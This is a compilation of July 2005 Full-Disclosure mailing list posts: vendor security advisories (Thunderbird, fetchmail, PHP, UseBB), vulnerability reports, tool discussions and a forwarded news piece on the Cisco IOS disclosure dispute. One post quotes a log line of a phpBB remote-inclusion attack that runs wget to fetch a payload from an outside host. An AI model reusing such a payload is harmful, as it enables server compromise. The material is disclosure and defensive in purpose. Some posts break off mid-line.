[Full-disclosure] MDKSA-2005:127 - Updated mozilla-thunderbird packages fix multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Update Advisory
 _______________________________________________________________________

 Package name:           mozilla-thunderbird
 Advisory ID:            MDKSA-2005:127
 Date:                   July 28th, 2005

 Affected versions:      10.2
 ______________________________________________________________________

 Problem Description:

 A number of vulnerabilities were reported and fixed in Thunderbird 1.0.5
 and Mozilla 1.7.9. The following vulnerabilities have been backported and
 patched for this update:

 The native implementations of InstallTrigger and other XPInstall-related
 javascript objects did not properly validate that they were called on
 instances of the correct type. By passing other objects, even raw numbers,
 the javascript interpreter would jump to the wrong place in memory.
 Although no proof of concept has been developed we believe this could be
 exploited (MFSA 2005-40).

 moz_bug_r_a4 reported several exploits giving an attacker the ability to
 install malicious code or steal data, requiring only that the user do
 commonplace actions like clicking on a link or open the context menu. The
 common cause in each case was privileged UI code ("chrome") being overly
 trusting of DOM nodes from the content window. Scripts in the web page can
 override properties and methods of DOM nodes and shadow the native values,
 unless steps are taken to get the true underlying values (MFSA 2005-41).

 Additional checks were added to make sure Javascript eval and Script
 objects are run with the privileges of the context that created them, not
 the potentially elevated privilege of the context calling them, in order
 to protect against an additional variant of MFSA 2005-41 (MFSA 2005-44).

 In several places the browser UI did not correctly distinguish between
 true user events, such as mouse clicks or keystrokes, and synthetic events
 generated by web content. The problems ranged from minor annoyances like
 switching tabs or entering full-screen mode, to a variant on MFSA 2005-34.
 Synthetic events are now prevented from reaching the browser UI entirely
 rather than depend on each potentially spoofed function to protect itself
 from untrusted events (MFSA 2005-45).

 Scripts in XBL controls from web content continued to be run even when
 Javascript was disabled. By itself this causes no harm, but it could be
 combined with most script-based exploits to attack people running
 vulnerable versions who thought disabling javascript would protect them.
 In the Thunderbird and Mozilla Suite mail clients Javascript is disabled
 by default for protection against denial-of-service attacks and worms;
 this vulnerability could be used to bypass that protection (MFSA 2005-46).

 When InstallVersion.compareTo() is passed an object rather than a string
 it assumed the object was another InstallVersion without verifying it.
 When passed a different kind of object the browser would generally crash
 with an access violation. shutdown has demonstrated that different
 javascript objects can be passed on some OS versions to get control over
 the instruction pointer. We assume this could be developed further to run
 arbitrary machine code if the attacker can get exploit code loaded at a
 predictable address (MFSA 2005-50).

 A child frame can call top.focus() even if the framing page comes from a
 different origin and has overridden the focus() routine. The call is made
 in the context of the child frame. The attacker would look for a target
 site with a framed page that makes this call but doesn't verify that its
 parent comes from the same site. The attacker could steal cookies and
 passwords from the framed page, or take actions on behalf of a signed-in
 user. This attack would work only against sites that use frames in this
 manner (MFSA 2005-52).

 Parts of the browser UI relied too much on DOM node names without taking
 different namespaces into account and verifying that nodes really were of
 the expected type. An XHTML document could be used to create fake
 elements, for example, with content-defined properties that the browser
 would access as if they were the trusted built-in properties of the
 expected HTML elements. The severity of the vulnerability would depend on
 what the attacker could convince the victim to do, but could result in
 executing user-supplied script with elevated "chrome" privileges. This
 could be used to install malicious software on the victim's machine
 (MFSA 2005-55).

 Improper cloning of base objects allowed web content scripts to walk up
 the prototype chain to get to a privileged object. This could be used to
 execute code with enhanced privileges (MFSA 2005-56).

 The updated packages have been patched to address these issues.
 ______________________________________________________________________
[Full-disclosure] MDKSA-2005:126 - Updated fetchmail packages fix vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Update Advisory
 _______________________________________________________________________

 Package name:           fetchmail
 Advisory ID:            MDKSA-2005:126
 Date:                   July 28th, 2005

 Affected versions:      10.1, 10.2, Corporate 3.0, Corporate Server 2.1
 ______________________________________________________________________

 Problem Description:

 A buffer overflow was discovered in fetchmail's POP3 client which could
 allow a malicious server to send a carefully crafted message UID, causing
 fetchmail to crash or potentially execute arbitrary code as the user
 running fetchmail.

 The updated packages have been patched to address this problem.
 ______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2335
 ______________________________________________________________________

 Updated Packages:

 [MD5 checksums and package file names for Mandrakelinux 10.1, 10.2,
 Corporate Server 2.1 and Corporate 3.0 (i586 and x86_64) omitted]
 ______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
 ______________________________________________________________________

 Type Bits/KeyID
Re: [Full-disclosure] Defeating Microsoft WGA Validation Check
Or to restate, you mean "So many ways to skin a cat when it comes to exposing M$ insecurity..." =) right? hehe

Scott.
-- 
Don't believe every^H^H^H^H^Hanything the M$ advertising/P.R. dept tells you.

On 7/28/05, Michael Evanchik <[EMAIL PROTECTED]> wrote:
>
> Btw, I know of 2 other ways to bypass this WGA myself as well. So many ways
> to skin a cat when it comes to Microsoft security.
>
> Mike
> www.michaelevanchik.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] nProtect solutions arbitrary file download and execute vulnerability
Title:
  nProtect:Netizen arbitrary file download and execute vulnerability
  nProtectPersonal Web Service arbitrary file download and execute vulnerability

Discoverer: PARK, GYU TAE ([EMAIL PROTECTED])

Neo Advisory No.: NRVA05-04, NRVA05-05

Critical: High critical
Impact: Gain remote user's privilege
Where: From remote
Operating System: Windows only
Solution: Patched

Notice:
  07. 01. 2005  Initial notification
  07. 04. 2005  Second notification
  07. 26. 2005  Patched
  07. 29. 2005  Vulnerability disclosed

Description:

nProtect:Netizen and nProtectPersonal Web Service are antivirus solutions. They defend the user from well-known hack tools and viruses on the Internet.

When they need to update and patch themselves, they download from a web site such as update.nprotect.net. At that time the nProtect update program, npdownv.exe, DOES NOT CHECK the update site URL!!! We can change the URL, the update configuration file and so on.

But npdownv.exe DOES CHECK that the files downloaded from the update site are compressed WITH A PASSWORD!!! This means npdownv.exe already knows the password for decompression. I found the password in npdownv.exe by REVERSE ENGINEERING, and Neo modified liveup.haz, the configuration file.

When the user accesses the phishing page, the trojan is downloaded from the hacker's URL.

See the following detailed description: EXPLOIT NOT INCLUDED HERE

Related link: http://www.nprotect.co.kr/service/nProtectPersonal/nprotect/npos/kor/personal_npos.html

Special thanks to my best group [EMAIL PROTECTED].

PS. I'm very sorry for my poor Konglish.
[Full-disclosure] [FLSA-2005:163559] Updated php packages fix security issues
---------------------------------------------------------------------
                   Fedora Legacy Update Advisory

Synopsis:          Updated php packages fix security issues
Advisory ID:       FLSA:163559
Issue date:        2005-07-28
Product:           Fedora Core
Keywords:          Bugfix
CVE Names:         CAN-2005-1751 CAN-2005-1921
---------------------------------------------------------------------

1. Topic:

Updated PHP packages that fix two security issues are now available.

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.

2. Relevant releases/architectures:

Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

A bug was discovered in the PEAR XML-RPC Server package included in PHP. If a PHP script is used which implements an XML-RPC Server using the PEAR XML-RPC package, then it is possible for a remote attacker to construct an XML-RPC request which can cause PHP to execute arbitrary PHP commands as the 'apache' user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2005-1921 to this issue.

A race condition in temporary file handling was discovered in the shtool script installed by PHP. If a third-party PHP module which uses shtool was compiled as root, a local user may be able to modify arbitrary files. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2005-1751 to this issue.

Users of PHP should upgrade to these updated packages, which contain backported fixes for these issues.

4. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs.

Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=163559

6. RPMs required:

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/php-4.3.11-1.fc1.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/php-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-devel-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-domxml-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-imap-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-ldap-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-mbstring-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-mysql-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-odbc-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-pgsql-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-snmp-4.3.11-1.fc1.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-xmlrpc-4.3.11-1.fc1.2.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/php-4.3.11-1.fc2.3.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/php-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-devel-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-domxml-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-imap-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-ldap-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-mbstring-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-mysql-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-odbc-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-pgsql-4.3.11-1.fc2.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-snmp-4.3.11-1.fc2.3.legacy.i386.rpm
h
[Full-disclosure] Microsoft MSN MESSENGER PATCH PLUS. Exclusive download for registered users.
Just wanted to expose this spammer's site. I noticed the following in my web logs:

200.233.226.8 - - [27/Jul/2005:20:16:08 -0700] "GET /admin_styles.php?phpbb_root_path=http://pharoeste.net/x/out.gif?&cmd=cd%20/tmp;%20wget%20http://binaryshadow.org/~w00t /dc.txt;ls HTTP/1.1" 404 7279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"

It is apparent from the logs above and research I have done that he is trying to exploit a phpBB vuln in order to compromise hosts and use them as spam relays.

spammer's drop site: http://www.binaryshadow.org/~w00t/
mirror: http://www.security-protocols.com/binaryshadow-mirror/

Thanks,

Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78
RE: [Full-disclosure] Defeating Microsoft WGA Validation Check
Btw, I know of 2 other ways to bypass this WGA myself as well. So many ways to skin a cat when it comes to Microsoft security.

Mike
www.michaelevanchik.com

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Debasis Mohanty
Sent: Wednesday, July 27, 2005 1:27 PM
To: 'Full-Disclosure'
Subject: RE: [Full-disclosure] Defeating Microsoft WGA Validation Check

>> hi, I came across your site from the article at www.vnunet.com about this validation workaround. I just have a question, will this workaround work with Microsoft
>> Windows Update site?

I never tested it for Windows Update. However, as per M$ recent statement windows update will work irrespective of the OS being genuine or not. The test that I conducted was purely done for those Microsoft tools / products available on the M$ download centre which install only on a genuine copy of Windows.

>> Nowhere in the article or on your workaround instructions mentions how this could also work with Windows Update site. Or I could have missed it or something,
>> could this check work with W2K as well?

FYI: Microsoft has fixed this issue immediately, a few days after the workaround was released. So the workaround might not work for any of the current downloads from M$ download centre. Bad Luck ... ;o)

There are still ways to circumvent WGA, I am currently working on it but can't comment anything at this point of time.

Debasis Mohanty
www.hackingspirits.com

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of goosee007
Sent: Wednesday, July 27, 2005 11:50 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Defeating Microsoft WGA Validation Check

hi, I came across your site from the article at www.vnunet.com about this validation workaround. I just have a question, will this workaround work with Microsoft Windows Update site? Nowhere in the article or on your workaround instructions mentions how this could also work with Windows Update site. Or I could have missed it or something, could this check work with W2K as well?

thanks
goose
[Full-disclosure] Re: bluetooth devices list ?
Also have a look at www.bluescanner.org for a Windows Bluetooth discovery tool.

To: pen-test at securityfocus.com, full-disclosure at lists.grok.org.uk, security-basics at securityfocus.com
cc:
Subject: bluetooth devices list ?

Alo folks

a) has anyone the last list about the vulnerable devices (mobile, devices, etc) under bluetooth? something like this (the section "who's vulnerable"):
http://www.thebunker.net/security/bluetooth.htm

b) has anyone the best mail-lists, tools, links and research about the vulnerabilities about bluetooth?

- Mark :-)
[Full-disclosure] SPIDynamics WebInspect Cross-ApplicationScripting (XAS)
SPI Dynamics Security Bulletin SPI-0001-07282005

Issue: Potential WebInspect Cross Application Scripting (XAS) Vulnerability
Severity: Low
Potential Impact: Remote Code Execution
Recommendation: All customers should run SmartUpdate to ensure they are running the latest version of WebInspect (5.5.386 or later).

Affected Software:
WebInspect 5.0.196

Non-Affected Software:
WebInspect 5.5
QAInspect (all versions)
DevInspect (all versions)
SecureObjects (all versions)
AMP (all versions)

Description:
SPI Dynamics has investigated a public report of a Cross Application Scripting (XAS) vulnerability in WebInspect. We have verified that WebInspect 5.5 (released May 16th, 2005) is not vulnerable; however, WebInspect version 5.0.196 was susceptible. We recommend all customers upgrade to WebInspect 5.5, which can be performed automatically at any time by running SmartUpdate.

Background:
Cross application scripting (XAS) is possible when an application executes data in a security context different from the original content (presumably one with less security restrictions). For example the data may be obtained from an un-trusted source (a remote web server) that is sent unfiltered into a trusted application, such as when web content is downloaded from a remote server and then re-displayed on the local host. Any application that downloads and then later displays and executes web content (such as JavaScript) may be vulnerable to XAS.

Disclosure Timeline:
April 15, 2005 08:01 AM – Initial disclosure to SPI Dynamics
April 15, 2005 09:28 AM – Initial SPI Dynamics response
July 26, 2005 04:45 AM – Public posting of disclosure (not coordinated with SPI Dynamics)

Acknowledgements:
SPI Dynamics wishes to thank Sergey V. Gordeychik for informing us of this vulnerability.

Disclaimer:
The information provided in this bulletin is provided "as is" without warranty of any kind. SPI Dynamics, Inc. disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall SPI Dynamics, Inc. or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if SPI Dynamics, Inc. or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Revisions:
V1.0 (July 27, 2005): Internal Release
V1.1 (July 28, 2005): Bulletin published

Contact:
Security issues and questions related to security bulletins may be sent to SPI Dynamics at [EMAIL PROTECTED]
[Full-disclosure] Advisory 12/2005: UseBB Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                        Hardened PHP Project
                        www.hardened-php.net

                      -= Security  Advisory =-

     Advisory: UseBB Multiple Vulnerabilities
 Release Date: 2005/07/28
Last Modified: 2005/07/28
       Author: Stefan Esser <[EMAIL PROTECTED]>

  Application: UseBB <= 0.5.1
     Severity: Multiple SQL injection and XSS vulnerabilities may
               result in disclosure of administrators' credentials.
         Risk: High
Vendor Status: Vendor has released an updated version
   References: http://www.hardened-php.net/advisory_122005.60.html

Overview:

   UseBB is the easy to set up and easy to use PHP and MySQL based forum
   package, distributed freely under the GPL license. It is being built
   by a team of voluntary developers from all over the world, for use on
   small to medium sized websites which need a clear and efficient forum
   package.

   By accident we stumbled over UseBB and audited it, because we have
   never seen a PHP forum system that is free of vulnerabilities. During
   our work, we have discovered two holes that were not yet fixed in the
   CVS and may allow compromising user accounts.

   One of the vulnerabilities is a XSS vulnerability that is only
   exploitable in Internet Explorer and the other one is a SQL injection
   vulnerability that requires magic_quotes_gpc turned off to be
   exploitable, which is the recommended setting.

Details:

   An audit of UseBB revealed that the code is actually one of the better
   pieces of PHP web applications, although it uses the not recommended
   magic_quotes_runtime feature. The authors always try to initialise
   their variables correctly and whenever possible they filter user input
   before using it. However we were able to find two glitches in their
   code.

   The first one is in the handling of the color BBCode. The color value
   is not filtered and therefore it is possible for an attacker to inject
   arbitrary stylesheet information for the resulting tag. Within
   Internet Explorer this will allow Javascript execution, e.g. through a
   call of the expression() function.

   The other problem is located in the way the magic_quotes_gpc=Off
   emulation is implemented. When the feature is deactivated, which is
   the recommended setting, _GET, _POST and _COOKIE are automatically
   passed through addslashes(). Unfortunately _REQUEST is not
   automatically, and therefore the search function of the forum, which
   is the only place where _REQUEST is used, is not protected at all
   against any kind of SQL injection when magic_quotes_gpc is turned off.

   Both vulnerabilities could result in disclosure of arbitrary user
   credentials.

Proof of Concept:

   The Hardened-PHP Project is not going to release an exploit for this
   vulnerability to the public.

Disclosure Timeline:

   27. July 2005 - Vendor informed.
   27. July 2005 - Vendor has released updated version.
   28. July 2005 - Public disclosure.

Recommendation:

   We strongly recommend installing the updated version, 0.5.1a, which is
   available from the vendor's homepage, www.usebb.net.

GPG-Key:

   http://www.hardened-php.net/hardened-php-signature-key.asc

   pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1

Copyright 2005 Stefan Esser / Hardened PHP Project. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFC6VkdRDkUzAqGSqERAk2WAJ4ug+jsaGUS422U8vF3OSV/DfrOMACg05Ja
7xlU/Xg9j4J3JIayMEGkBXQ=
=2IYe
-----END PGP SIGNATURE-----
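An added example, not UseBB's code and with hypothetical function names, showing the two weaknesses the advisory describes next to a safe form of each: a whitelist for the [color=] BBCode value, and a magic_quotes_gpc emulation that covers $_REQUEST as well, with a prepared statement as the stronger fix for the search query.

```php
<?php
// Added example (not UseBB's code). Run from the CLI; the request arrays
// below are constructed sample input.

// 1. BBCode [color=...]: accept only a CSS colour keyword or a hex value,
//    so arbitrary stylesheet text (such as an expression() call in IE)
//    never reaches the generated tag.
function safe_color(string $value): ?string
{
    $ok = preg_match('/^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$/', $value);
    return $ok === 1 ? $value : null;
}

function render_color_bbcode(string $text): string
{
    return preg_replace_callback(
        '/\[color=([^\]]*)\](.*?)\[\/color\]/s',
        function (array $m): string {
            $color = safe_color($m[1]);
            $inner = htmlspecialchars($m[2], ENT_QUOTES, 'UTF-8');
            // Unknown colour value: drop the tag, keep the escaped text.
            if ($color === null) {
                return $inner;
            }
            return '<span style="color: ' . $color . '">' . $inner . '</span>';
        },
        $text
    );
}

// 2. magic_quotes_gpc=Off emulation. The weak form escapes only the
//    three superglobals; $_REQUEST is a separate copy of the same data,
//    so a search handler reading $_REQUEST['q'] still gets the raw value.
function emulate_magic_quotes_weak(): void
{
    $_GET    = array_map('addslashes', $_GET);
    $_POST   = array_map('addslashes', $_POST);
    $_COOKIE = array_map('addslashes', $_COOKIE);
    // $_REQUEST forgotten here.
}

// Fixed form: treat $_REQUEST like the others, and recurse into arrays.
function addslashes_deep($value)
{
    return is_array($value) ? array_map('addslashes_deep', $value) : addslashes((string) $value);
}

function emulate_magic_quotes_fixed(): void
{
    $_GET     = addslashes_deep($_GET);
    $_POST    = addslashes_deep($_POST);
    $_COOKIE  = addslashes_deep($_COOKIE);
    $_REQUEST = addslashes_deep($_REQUEST);
}

// Stronger than either emulation: bind the search term as a parameter so
// it is data regardless of the quoting state of the request. Not called in
// the demo below because it needs a live mysqli connection.
function search_posts(mysqli $db, string $term): array
{
    $stmt = $db->prepare('SELECT id, subject FROM posts WHERE subject LIKE ?');
    $like = '%' . $term . '%';
    $stmt->bind_param('s', $like);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Demo with constructed input: a single quote in the search term.
$_GET = $_REQUEST = ['q' => "o'brien"];
$_POST = $_COOKIE = [];
emulate_magic_quotes_weak();
echo "weak:  GET=", $_GET['q'], "  REQUEST=", $_REQUEST['q'], "\n";

$_GET = $_REQUEST = ['q' => "o'brien"];
emulate_magic_quotes_fixed();
echo "fixed: GET=", $_GET['q'], "  REQUEST=", $_REQUEST['q'], "\n";

echo render_color_bbcode('[color=red]ok[/color] [color=red;x:expression(1)]dropped[/color]'), "\n";
```

The first echo shows the raw quote surviving in $_REQUEST while $_GET is escaped; the last shows the malformed colour value being discarded while the text is kept.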
[Full-disclosure] [USN-155-2] Updated Epiphany packages to match Mozilla security update
===========================================================
Ubuntu Security Notice USN-155-2                July 28, 2005
epiphany-browser regressions
https://bugzilla.ubuntu.com/show_bug.cgi?id=13041
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

epiphany-browser

The problem can be corrected by upgrading the affected package to version 1.4.4-0ubuntu2.1. After a standard system upgrade you need to restart Epiphany to effect the necessary changes.

Details follow:

USN-155-1 fixed some security vulnerabilities of the Mozilla suite. Unfortunately this update caused regressions in the Epiphany web browser, which uses parts of the Mozilla browser. The updated packages fix these problems.

Source archives, architecture independent packages, and packages for the amd64 (Athlon64, Opteron, EM64T Xeon), i386 (x86 compatible Intel/AMD) and powerpc (Apple Macintosh G3/G4/G5) architectures:

[download URLs with Size/MD5 values omitted]
Re: [Full-disclosure] Considering nSight, any opinions?
On Thu, 28 Jul 2005, Jason Heschel wrote:

> Hi list,
>
> I tried sending this to a SecurityFocus list but I think everyone's at
> Blackhat or something. :)
>
> We've spent the last few weeks evaluating nSight (www.intrusense.com).
> It's been very helpful in identifying exactly what, when and who is
> eating up all of our internal network bandwidth as well as exposing some
> 'strange' internal network behavior which was causing some
> intermittent problems with our Windows hosts. Anyways, we're now
> considering making a purchase.
>
> I'm curious to hear any opinions, problems or praise people have for
> this software. Does it scale well? It seems to collect a lot of
> information. How does it perform after collecting several months worth
> of data?

While I'm not familiar with this product itself, this sounds like a knockoff of the Arbor product - which I LOVE, but which even the world's largest NSPs cringe at in terms of price.

If you have rudimentary shell scripting skills with just a touch of C, you can easily roll your own using netflow records. Barring that, this class of software provides useful information and I recommend them (by class) as "must-haves" to any medium or larger network.

HTH,

//Alif
[Full-disclosure] Re: Considering nSight, any options?
Jason,

Been running nSight for a little over a year now with data purge after 13 months. We have 3 agents at remote offices with each inspecting the traffic of around 700-900 hosts. It's been quite helpful. We *had* a ton of P2P traffic in our networks.

When we started out last year, we tried to host all 3 agents on a low end HP blade (with a laptop hd). After about 2 months it became very slow (mostly due to disk IO). We upgraded to a faster blade with fast SCSI disk and it's been flying along ever since.

Steve

On 7/28/05, Jason Heschel <[EMAIL PROTECTED]> wrote:
> Hi list,
>
> I tried sending this to a SecurityFocus list but I think everyone's at
> Blackhat or something. :)
>
> We've spent the last few weeks evaluating nSight (www.intrusense.com).
> It's been very helpful in identifying exactly what, when and who is
> eating up all of our internal network bandwidth as well as exposing some
> 'strange' internal network behavior which was causing some
> intermittent problems with our Windows hosts. Anyways, we're now
> considering making a purchase.
>
> I'm curious to hear any opinions, problems or praise people have for
> this software. Does it scale well? It seems to collect a lot of
> information. How does it perform after collecting several months worth
> of data?
>
> -jason
Re: [Full-disclosure] Considering nSight, any opinions?
Jon,

Actually ntop is what we're trying to move off of. It's a great tool, but we
needed more data and more flexibility. We looked at Q1Labs QRadar as well,
but couldn't afford it. nSight appears to be somewhere in the middle.

On 7/28/05, Jon Dossey <[EMAIL PROTECTED]> wrote:
> > Hi list,
> >
> > I tried sending this to a SecurityFocus list but I think everyone's at
> > Blackhat or something. :)
> >
> > We've spent the last few weeks evaluating nSight (www.intrusense.com).
> > It's been very helpful in identifying exactly what, when and who is
> > eating up all of our internal network bandwidth as well as exposing some
> > 'strange' internal network behavior which was causing some
> > intermittent problems with our Windows hosts. Anyways, we're now
> > considering making a purchase.
> >
> > I'm curious to hear any opinions, problems or praise people have for
> > this software. Does it scale well? It seems to collect a lot of
> > information. How does it perform after collecting several months' worth
> > of data?
> >
> > -jason
>
> I'm a big fan of NTOP (http://www.ntop.org) personally.
>
> Just span some ports on a core switch, set up your netflows, and watch
> the fireworks. Great piece of software. Just need to remember the
> PF_RING kernel patch if you're capturing a significant amount of
> traffic.
>
> .jon
[Full-disclosure] Considering nSight, any opinions?
Hi list,

I tried sending this to a SecurityFocus list but I think everyone's at
Blackhat or something. :)

We've spent the last few weeks evaluating nSight (www.intrusense.com).
It's been very helpful in identifying exactly what, when and who is
eating up all of our internal network bandwidth as well as exposing some
'strange' internal network behavior which was causing some
intermittent problems with our Windows hosts. Anyways, we're now
considering making a purchase.

I'm curious to hear any opinions, problems or praise people have for
this software. Does it scale well? It seems to collect a lot of
information. How does it perform after collecting several months' worth
of data?

-jason
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
Just because I know you haven't, I'm going to ask: have you tried a Snort
users group? A Snort usenet group? *Anyone*??? Didn't think so...

Or just RTFM right on the snort site.

http://www.snort.org/docs/snort_htmanuals/htmanual_233/node18.html

(there is a specific example addressing this EXACT issue)

Sec. 3.2.3 "IP Addresses", Figure: "Example IP Address Negation Rule"

~Mike.
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
> How to stop this event, i.e. not to detect this event. Please tell me in a
> brief note

There are 2 major ways to do this ...

1) Start Snort with the '-o' switch and then duplicate the offending
   signature using the 'pass' directive for the IP you want to ignore.

2) Use the negation operator (!) in the rule for the IP you want to ignore.

BTW: this topic doesn't belong on full-disclosure. Try the snort-users list.

Regards,

Michael Holstein CISSP GCIA
Cleveland State University
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
On Thu, 28 Jul 2005 09:49:46 +0200, Christoph Gruber said:
> On Wednesday, 27 July 2005 20:15, DAN MORRILL wrote:
>
> > I could see CERT doing this, but not 3com.
>
> CERT is too close to US Government

CERT is more hobbled by their traditional "wait till *all* vendors have
patches ready" stance than by any connection to the US .gov world.
[Full-disclosure] (Fwd) Cisco, ISS file suit against rogue researcher
[summary: this is not good news. ISS have cracked IOS, and Cisco is trying to
suppress it. Which means the bad guys have got the info to work with, but the
good guys can't defend against it (since the info is "incomplete"). All we can
say for now is that IOS is clearly vulnerable and this puts all Cisco routers
at risk. The fact that Cisco are trying to suppress it suggests the threat is
real. But due to the information vacuum created by Cisco's attempted
suppression, it's not possible to suggest a workaround. For now, the best
workaround is to avoid purchasing or using Cisco kit. What's the bet Cisco's
big customers have got the inside track? Surely they couldn't deny the fault
to the DOD. - Stu]

--- Forwarded message follows ---

http://www.securityfocus.com/news/11259

Cisco, ISS file suit against rogue researcher
Robert Lemos, SecurityFocus 2005-07-27

LAS VEGAS--Networking giant Cisco and security company Internet Security
Systems filed on Wednesday a restraining order against the management of the
Black Hat Conference and a security expert who told conference attendees that
attackers can broadly compromise Cisco routers.

    "What politicians are talking about when they talk about the Digital
    Pearl Harbor is a network worm. That's what we could see in the future,
    if this isn't fixed."
    -- Michael Lynn, independent security researcher and discoverer of a
    reliable method for running code on Cisco routers

The legal action followed a presentation by security researcher Michael Lynn,
a former ISS employee, who brushed off threats of legal action and a broad
effort to delete his presentation from conference materials to warn attendees
that malicious programs could be run on Cisco routers.

While the information had already been presented by Lynn, a Cisco spokesman
said that the companies wanted to prevent further dissemination of inside
information about Cisco's routers.

"We don't want them to further discuss it," said Cisco spokesman John Noh.
"This is about protecting our intellectual property."

Three weeks of intense discussions between ISS, the researcher, Cisco, and
conference management failed on Wednesday. Two days before, Cisco
representatives spent eight hours ripping out the ten-page presentation from
the conference book and ISS executives decided to pull the presentation,
allowing researcher Lynn to speak on a different topic.

In a dramatic reversal on Wednesday, Lynn told attendees he tendered his
resignation to ISS less than two hours before he went on stage to present his
findings, then proceeded to describe a reliable way to run programs by
exploiting the Internet Operating System (IOS), the core software for Cisco
routers.

"I feel I had to do what's right for the country and the national
infrastructure," he said. "It has been confirmed that bad people are working
on this (compromising IOS). The right thing to do here is to make sure that
everyone knows that it's vulnerable."

A majority of the Internet infrastructure relies on Cisco networking hardware
to route data from one computer to another. While security researchers have
found flaws in the IOS router software in the past, almost all the
vulnerabilities have only allowed an attacker to degrade communications in
what is known as a denial-of-service attack.

Lynn outlined a way to take control of an IOS-based router, using a buffer
